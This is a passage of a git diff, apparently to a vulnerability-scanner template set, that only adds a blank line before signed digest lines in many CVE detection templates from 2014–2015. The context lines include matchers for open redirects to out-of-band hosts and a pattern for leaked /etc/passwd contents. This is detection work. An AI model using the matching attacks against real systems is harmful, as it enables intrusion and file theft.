490a004630440220427e69dd7046a664d6e14cf29a5e00484e43eeca45ff2d5ab73653555efeaa020220499f2eb01f5ce909b7104bc017851a57c5eaf88dd9dcb48870211aa5ef6cc7f5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index a27287d317..f4174192e2 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -35,4 +35,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100ec71dd57d108c1e69b1ca486a78610718454793fedcecd8cb3a4a6427423cdfa0220151fbcce384dadaad5317d3743a55898d5d56af3e8172b86dedb33d2e13f13bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ec71dd57d108c1e69b1ca486a78610718454793fedcecd8cb3a4a6427423cdfa0220151fbcce384dadaad5317d3743a55898d5d56af3e8172b86dedb33d2e13f13bf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index bb1d340321..5d681647b3 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204eb1331a7792da978e3950a838d812b9b50b67770e27bd7b91a076a33448af24022048b333de6cb1795fb89a72bf4fd24469df0696477b1a985a4041a21dcad1caf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204eb1331a7792da978e3950a838d812b9b50b67770e27bd7b91a076a33448af24022048b333de6cb1795fb89a72bf4fd24469df0696477b1a985a4041a21dcad1caf3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 5d25f7593b..4e006a2526 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204996754f69ef34756c03985147cc7962f63026aa8ad4f21479fb2ac2436e27c6022060114996d073f14218a4cb685467b9c09552b49a324a179d86c17df741431c3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204996754f69ef34756c03985147cc7962f63026aa8ad4f21479fb2ac2436e27c6022060114996d073f14218a4cb685467b9c09552b49a324a179d86c17df741431c3b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 439ee782d8..dc09a110a2 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220019d27eab5ff4c086c315f1c5bc48832456b05b1af9b941ba474bfc6be1b787c02204d3c2d90ba6405c2055cf242b4d4b6b1b44086f183e6203c3dd95afb0588addc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220019d27eab5ff4c086c315f1c5bc48832456b05b1af9b941ba474bfc6be1b787c02204d3c2d90ba6405c2055cf242b4d4b6b1b44086f183e6203c3dd95afb0588addc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 055a598dfb..b9f32125d7 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022073a76b0c8c3893fe5105eef3c7c2e9e6d601e891f1788ef35c67e1804dfc407b022063afa3ccc1c7c27619034517a637755bfeca4e7fac6df5f1e0133c039a9278b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022073a76b0c8c3893fe5105eef3c7c2e9e6d601e891f1788ef35c67e1804dfc407b022063afa3ccc1c7c27619034517a637755bfeca4e7fac6df5f1e0133c039a9278b3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index 20b2fb2a09..98d567cba8 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022014f235ada9a50bba2db369b8e92d40e02709980c5526a43ee56962eff6a2da6f02202225c2331ae609ef2558da1c8faafd3e8c632e0813afcdacc7b0a326dfeeb2ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022014f235ada9a50bba2db369b8e92d40e02709980c5526a43ee56962eff6a2da6f02202225c2331ae609ef2558da1c8faafd3e8c632e0813afcdacc7b0a326dfeeb2ee:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index dfb1474ec5..91f873755b 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -62,4 +62,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022061e744ca8289f7e59c45123d92fea66fb7fc1af16cb7f8963f06233268a890b00220305226a2e35071b31438607503bd9f7fda1fb51340274dce1c6e7a9593b46455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022061e744ca8289f7e59c45123d92fea66fb7fc1af16cb7f8963f06233268a890b00220305226a2e35071b31438607503bd9f7fda1fb51340274dce1c6e7a9593b46455:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 1db428fd43..f2928042b0 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204b6098a29808ddf797c054250dcea2a9fc1cb9c23cd257c2697aa63ffea4c926022100b24530818987497ec0d0d7a25ef6a53247501d0cce15588dfc9acd6962e8bb30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204b6098a29808ddf797c054250dcea2a9fc1cb9c23cd257c2697aa63ffea4c926022100b24530818987497ec0d0d7a25ef6a53247501d0cce15588dfc9acd6962e8bb30:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index b34748131f..f38b249d0d 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201f77459f745db7e9ce87c08640595d0522f93e2aed6b7b105a5ff56ba5f6720b022100e3bd14f585a8275af8c8e8616e7f077907cc37d60de308cb6e3ec485d70e5bfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201f77459f745db7e9ce87c08640595d0522f93e2aed6b7b105a5ff56ba5f6720b022100e3bd14f585a8275af8c8e8616e7f077907cc37d60de308cb6e3ec485d70e5bfe:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 981cca87f9..72f69acb4c 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220754286c6b08060a245694143ccffd8066a111e3cb036ea5b90af20df26fced87022100fbd36569ad1b9e34e4f9216c35956d0efafb18e318bdb9a8f72e1b93495c5c5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220754286c6b08060a245694143ccffd8066a111e3cb036ea5b90af20df26fced87022100fbd36569ad1b9e34e4f9216c35956d0efafb18e318bdb9a8f72e1b93495c5c5d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index b36199b66b..65c5734cf6 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fd39f8ae7c4f4147065e9e28d48424f0025fc47f6bd2cddb207f47970bfe8dc4022100e528f47274a5901370493649a4cb95f3ef76c90b9e86b0950ca807db51181938:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100fd39f8ae7c4f4147065e9e28d48424f0025fc47f6bd2cddb207f47970bfe8dc4022100e528f47274a5901370493649a4cb95f3ef76c90b9e86b0950ca807db51181938:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index e82de118c2..ebdf523aeb 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cef6db40ddf68207b7c57b5f659aecbba9da0adcba61ec4475e24be3b00db2f30221008b21b58e5c29419c4cf864e10321306047afbb6a6cc088f0a3bddbaf179d927b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cef6db40ddf68207b7c57b5f659aecbba9da0adcba61ec4475e24be3b00db2f30221008b21b58e5c29419c4cf864e10321306047afbb6a6cc088f0a3bddbaf179d927b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index d55f4f0943..d7c7b1307e 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -42,4 +42,5 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and -# digest: 4b0a00483046022100af39e3ae5fa7c3a01180222d4e81e4c57e40c94b89ca52828eb9ca34f47f3868022100c0be225963aadf146f1fcd5493caaafe5180afe54702cfaab752a4e3dfda1b32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100af39e3ae5fa7c3a01180222d4e81e4c57e40c94b89ca52828eb9ca34f47f3868022100c0be225963aadf146f1fcd5493caaafe5180afe54702cfaab752a4e3dfda1b32:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 5ebaa5480f..6d052b7ac3 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -55,4 +55,5 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "ab-google-map-travel")' condition: and -# digest: 4b0a0048304602210081d30586be082e31f5ebec246c89ac22994dc74d7cea0192f0fa87edabb4a46c0221008c3d16b9cd32db5c3f5e3047ee27f0f3ba7ae8862a000b7e698227c5a85fa586:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210081d30586be082e31f5ebec246c89ac22994dc74d7cea0192f0fa87edabb4a46c0221008c3d16b9cd32db5c3f5e3047ee27f0f3ba7ae8862a000b7e698227c5a85fa586:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index c12477b6f1..1ca1707a7a 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -49,4 +49,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204dd3b3ee4bf13d5bb82269fc3d8f4624fbf0ff3e7289558073901b712df4fe48022100c4d018b76cdd1d2ac139eae7e9561a1b10a2fbacce9784a477882dc5ad4c2883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204dd3b3ee4bf13d5bb82269fc3d8f4624fbf0ff3e7289558073901b712df4fe48022100c4d018b76cdd1d2ac139eae7e9561a1b10a2fbacce9784a477882dc5ad4c2883:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index f4665d1100..f2b67d9f92 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 -# digest: 4a0a00473045022100840edaa8a2958e5021094f61356243285851ad5b240777b190426fc3b78dce2202206630b20f923aa53d2b864e475644e10c6f36031b5a59e22ae6b65a28fe913202:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100840edaa8a2958e5021094f61356243285851ad5b240777b190426fc3b78dce2202206630b20f923aa53d2b864e475644e10c6f36031b5a59e22ae6b65a28fe913202:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index b89c35d6ba..f14f477f60 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e010c4451e4c4d6c65f0a3c6bf2d8ac0a2df4c1a9df79cdb7ddb81ee649ee4ca02206b855e880ea361acea5af6927b3fc7ae50431f6d0504f3126f18d27e0ca14eaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e010c4451e4c4d6c65f0a3c6bf2d8ac0a2df4c1a9df79cdb7ddb81ee649ee4ca02206b855e880ea361acea5af6927b3fc7ae50431f6d0504f3126f18d27e0ca14eaf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 87678a9f3c..bb19535669 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100885f281c46bb17f5a76b4d7074ac076c359038a87ba19432ec34edfd43e4b27f022011afe525a91657bd80008a1cac8b19e0e324c91b1bbe1236f575f398f4a7bfbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100885f281c46bb17f5a76b4d7074ac076c359038a87ba19432ec34edfd43e4b27f022011afe525a91657bd80008a1cac8b19e0e324c91b1bbe1236f575f398f4a7bfbd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index e487341ed2..747ec50822 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bcd33f7540eb090ee57ad0510e9c9f88a3a9064eac82bbbf79c6b2280862d56c02206551d79c5b3098a631e0b716b3ee1ba2461e527132e7f19e6bebce5e045e5228:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bcd33f7540eb090ee57ad0510e9c9f88a3a9064eac82bbbf79c6b2280862d56c02206551d79c5b3098a631e0b716b3ee1ba2461e527132e7f19e6bebce5e045e5228:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index df7d9ed873..0560c3ecd4 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402201ea2231e46a6d3390ea981950b4f62d053571d479a11ee163c37e3c2baf230f402200a9a91bbe742cdffb781c96b70fe169037feac679d518330072f7a48c5c886f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201ea2231e46a6d3390ea981950b4f62d053571d479a11ee163c37e3c2baf230f402200a9a91bbe742cdffb781c96b70fe169037feac679d518330072f7a48c5c886f5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 1dcce80678..657096e635 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -47,4 +47,5 @@ http: - type: regex regex: - "root:[x*]:0:0:" -# digest: 4a0a00473045022100d7ca94aca89cb77d3d2ee86e2a318e1ad89fdfd6eb4f54cd35dddbb69eac6ea802205e17872842a0d73dc0cbbfd614ea7f8939596fc35ee9066ada7e44fe03af2627:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d7ca94aca89cb77d3d2ee86e2a318e1ad89fdfd6eb4f54cd35dddbb69eac6ea802205e17872842a0d73dc0cbbfd614ea7f8939596fc35ee9066ada7e44fe03af2627:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index 5889f91927..5987969a60 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b8da92970a6e510230733d16cc0e4f1d6e51a5363a7259d2be76b1ea89b2c3410221009b3ed70b524e380c926a5d80d9397d8aff9279ff55fd361b38c35c70aeed21d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b8da92970a6e510230733d16cc0e4f1d6e51a5363a7259d2be76b1ea89b2c3410221009b3ed70b524e380c926a5d80d9397d8aff9279ff55fd361b38c35c70aeed21d7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 2a32cfdcd7..43770d8d78 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -50,4 +50,5 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and -# digest: 4a0a00473045022100ea46ba640260a01ab312d945a4e34813efc9088c67a643cac9226ed300080b1702202ae2b1d0ede1a9fa43d7d45532d08b8878719b3290c2bde73ca05f566e2f770f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ea46ba640260a01ab312d945a4e34813efc9088c67a643cac9226ed300080b1702202ae2b1d0ede1a9fa43d7d45532d08b8878719b3290c2bde73ca05f566e2f770f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 2e53728f71..ce208116d9 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -48,4 +48,5 @@ http: - 'status_code_2 == 200' - "contains(body_2, '') && contains(body_2, 'newstatpress')" condition: and -# digest: 490a00463044022031e1d506c18b8050cabbe1110116bf11a7714b14caf2bac7a5048aae439f2cd502203b8c1afaf3f7969df39f21dfaf76bd74576527b673da78b50ecca7d0e0966c52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022031e1d506c18b8050cabbe1110116bf11a7714b14caf2bac7a5048aae439f2cd502203b8c1afaf3f7969df39f21dfaf76bd74576527b673da78b50ecca7d0e0966c52:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 222893f922..93ba3bbfed 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d51616c17995f247f78507d663e1439f4f4259a595c1a252ba81744e092a0b07022100a34fb87b9f638f9c4056f65b5c49ec9ebb9f4e94ec7909e390d8c92866e62990:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d51616c17995f247f78507d663e1439f4f4259a595c1a252ba81744e092a0b07022100a34fb87b9f638f9c4056f65b5c49ec9ebb9f4e94ec7909e390d8c92866e62990:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 9861b3c62c..5e0fd4da15 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b3e159f474fa126e17f4b9d69a86933094f9c7274706b1d33361e04c275ff9b20220337369fb470ded34dad3d6a1147868eb9560c0f96c246a174cfa3280c90e49fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b3e159f474fa126e17f4b9d69a86933094f9c7274706b1d33361e04c275ff9b20220337369fb470ded34dad3d6a1147868eb9560c0f96c246a174cfa3280c90e49fa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 5d193c7c70..0a47cd7dec 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205d69152617af7d603b7d90874c7a16c4ae774da2b88df53cf4ad09933f3877d4022100ddc6e06e8f7584f0a884eb096bf5020864d483879f6e8379fe7efaf51eb86992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205d69152617af7d603b7d90874c7a16c4ae774da2b88df53cf4ad09933f3877d4022100ddc6e06e8f7584f0a884eb096bf5020864d483879f6e8379fe7efaf51eb86992:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 86ccca7a4a..9faeacccba 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c3c8ea2b80935fe3906f5e9c39e4b9fad9253e2d4ce9b6b91fa8475532e2c52b02207c0e5da7b837557efa15de1b1211756039fdf8787100ea9810e5dcca0a2a17d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c3c8ea2b80935fe3906f5e9c39e4b9fad9253e2d4ce9b6b91fa8475532e2c52b02207c0e5da7b837557efa15de1b1211756039fdf8787100ea9810e5dcca0a2a17d3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index 75f5ef4e08..e1bc78bc14 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402206ffafbcc95e5d4ef7aab01fa29d5e760b0b1af528c7c73bdb8d29d0c886d5630022026ffb1dec59a5d8c7a066dd5d6552e85a1947cd05b245235bda4be5226238356:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206ffafbcc95e5d4ef7aab01fa29d5e760b0b1af528c7c73bdb8d29d0c886d5630022026ffb1dec59a5d8c7a066dd5d6552e85a1947cd05b245235bda4be5226238356:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index 9f1cc25393..861642b4e3 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402202eec8481c5c0d456cff0e1caaf063880930685b4d2894c28b42ee63f2b7b7cab022032e1bde9e7f7a27ca687df58582e4a8833fc10b7a972d373a4004f4e7b60d442:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202eec8481c5c0d456cff0e1caaf063880930685b4d2894c28b42ee63f2b7b7cab022032e1bde9e7f7a27ca687df58582e4a8833fc10b7a972d373a4004f4e7b60d442:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index e49c16fa45..5674f14abf 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -39,4 +39,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a0046304402202b80c88832d31599a52c75146be7b87146fd2bcdd09f2d2b2e230520cb48fb370220511d84a639f0e13b8b84d115cd2a119b55a216d7adf181a16a97d02ea49e4287:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202b80c88832d31599a52c75146be7b87146fd2bcdd09f2d2b2e230520cb48fb370220511d84a639f0e13b8b84d115cd2a119b55a216d7adf181a16a97d02ea49e4287:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 873a6d5733..47398c00b6 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200e5ad12d2f70cd5fa5e24453101a125ea966ed20ac1b75ced034905e5c894b10022048e6e69349ee35d9572bf201bdd440f767cd473a4bac30f897f817926c4306c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200e5ad12d2f70cd5fa5e24453101a125ea966ed20ac1b75ced034905e5c894b10022048e6e69349ee35d9572bf201bdd440f767cd473a4bac30f897f817926c4306c8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index a8309db351..27c3432f68 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200a4dbd52938f3ea2c92ac564a6ac78a9b41eacc9b04ba486c2fef4ea38512fad02206272c0156c5bd44dc8762464927e8cd9436958cb930e067830474112ae0186cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200a4dbd52938f3ea2c92ac564a6ac78a9b41eacc9b04ba486c2fef4ea38512fad02206272c0156c5bd44dc8762464927e8cd9436958cb930e067830474112ae0186cd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index 456114baf1..baf001a5f5 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200a072a5e66877abc29f5ad083497f958871369a47fb268c2b044c887eafe098f022074d7ead86d82bc012d4057325dc9268dbdbac86fe359b04e62fbe8b591cf0462:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200a072a5e66877abc29f5ad083497f958871369a47fb268c2b044c887eafe098f022074d7ead86d82bc012d4057325dc9268dbdbac86fe359b04e62fbe8b591cf0462:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 8ff77f13a6..76f93d4352 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -45,4 +45,5 @@ http: part: body words: - "" -# digest: 4a0a0047304502203240b0b10fe845cadda60ae7f54bab84270df911f80062dede932be879cc82af022100db3614a2a7d8371b8cf4d5bbf0feb265d295b344c8f3b88dc177ae611442774d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203240b0b10fe845cadda60ae7f54bab84270df911f80062dede932be879cc82af022100db3614a2a7d8371b8cf4d5bbf0feb265d295b344c8f3b88dc177ae611442774d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index c0c9fe4297..46c94e86d0 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207709617721f7abc300a71b2a196921f040278232bc9da86a9477b9ce27e77c92022100d6da720f4c3edbdb9e45bcdcaddc26a4473b718272074f28455465ac6ce6f479:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207709617721f7abc300a71b2a196921f040278232bc9da86a9477b9ce27e77c92022100d6da720f4c3edbdb9e45bcdcaddc26a4473b718272074f28455465ac6ce6f479:922c64590222798bb761d5b6d8e72950 diff --git 